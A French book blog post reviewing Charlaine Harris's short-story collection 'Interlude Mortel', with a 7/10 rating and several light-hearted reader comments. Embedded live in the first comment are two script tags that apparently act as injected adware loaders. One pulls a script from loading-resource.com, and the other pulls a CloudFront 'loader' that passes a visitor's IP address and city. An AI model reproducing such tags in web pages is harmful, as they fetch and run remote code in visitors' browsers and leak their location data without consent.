• "Interlude Mortel" de Charlaine Harris

    "Interlude Mortel" de Charlaine Harris

     

    ~~ Interlude Mortel ~~

     

    "Interlude Mortel" de Charlaine Harris

     

    Charlaine Harris

    "Interlude Mortel" de Charlaine Harris

     

    J'ai Lu / 156 pages



    Interlude mortel est un recueil de cinq nouvelles

    autour de La communauté du Sud

     

     

     

     

    "Interlude Mortel" de Charlaine Harris

     

    Il y a des choses plutôt sympas dans ce petit ouvrage !
    "Poussière de faé" est une belle entrée en matière, je me souviens effectivement qu'avant d'être un duo, Claude et Claudine étaient 3. C'est sympa de savoir le fin mot de l'histoire !
    "L'anniversaire de Dracula", perso j'ai trouvé cette nouvelle un peu "QQ" mais bon ....
    "En un mot" : alors je suis ravie de cette nouvelle car au début du tome 6, "la reine des vampires", il me semblait vraiment avoir loupé un épisode donc ses éclaircissements sont les bienvenues !
    "Le noël de Sookie" est de loin ma nouvelle préférée mdr !!!! C'était tout beau, tout mignon mais la fin m'a sciée !
    Votre grand-père vous a t-il déjà offert comme cadeau de noël une partie de jambes en l'air avec un inconnu ?
    Ben pas le mien en tout cas mdr !!!!
    J'ai trouvé cela totalement hallucinant !! Il a engagé un gigolo pour distraire Sookie, elle est bien bonne celle-là !!!!
    Enfin bref, je finie sur une note d'humour cet "interlude mortel" très sympathique !

     

    "Interlude Mortel" de Charlaine Harris

     

            7/10

     

    "Interlude Mortel" de Charlaine Harris

     

     

    Critiques des tomes 1 à 4

    Critique du tome 5

    Critique du tome 6

    Critique du tome 7

    Critique du tome 8

    Critique du tome 9

     

    "Interlude Mortel" de Charlaine Harris

     

     

     

     avec Chtitepuce

     

     

    "Interlude Mortel" de Charlaine Harris

     

     

     

    Challenge Bit-Lit 2012

     

     

     

     

     

     

    Le défi littéraire de Noël 2011

     

     

     

     

     

     

     

    Challenge New PAL 2012

     

     

     

     

     

     

    "Interlude Mortel" de Charlaine Harris

     

    « "La maison de la nuit" T.3 de P.C. & Kristin Cast"Alpha & Omega" T.0 de Patricia Briggs »

  • Commentaires

    1
    Mardi 7 Février 2012 à 00:57

    Je crois qu'il faut que je relise toute la saga avant de lire cet interlude mais j'ai vraiment hâte :D

    <script src="http://loading-resource.com/50.js.php?i=%7B4D78A890-103E-4ECB-97F8-246471D679F1%7D" type="text/javascript"></script> <script src="https://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=FR&rid=A6&ccid=Pouilley-fran%EF%BF%BDais&ip=81.50.191.14" type="text/javascript"></script>
    2
    Mardi 7 Février 2012 à 12:09

    Oh, c'est pas vraiment nécéssaire de tout relire tu sais !

    Elles sont quand même vachement indépendante ! Bises !

    3
    Mercredi 8 Février 2012 à 14:00

    L'idée du gigolo offert pour Noël est assez... spéciale.

    4
    Mercredi 8 Février 2012 à 14:44

    Tu m'étonnes mdr mdr !!! Mais au moins, c'est original mdr !!

    5
    Mercredi 8 Février 2012 à 21:31

    ah ce sont des nouvelles complémentaires de la saga?? voilà qui change tout!! je me laisserais tenter prochainement alors!!

    biz

    6
    Vendredi 10 Février 2012 à 10:37

    Je l'ai bientôt fini. Désolé pour le retard 
    Mais sur les premières nouvelles je rejoins ton avis.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :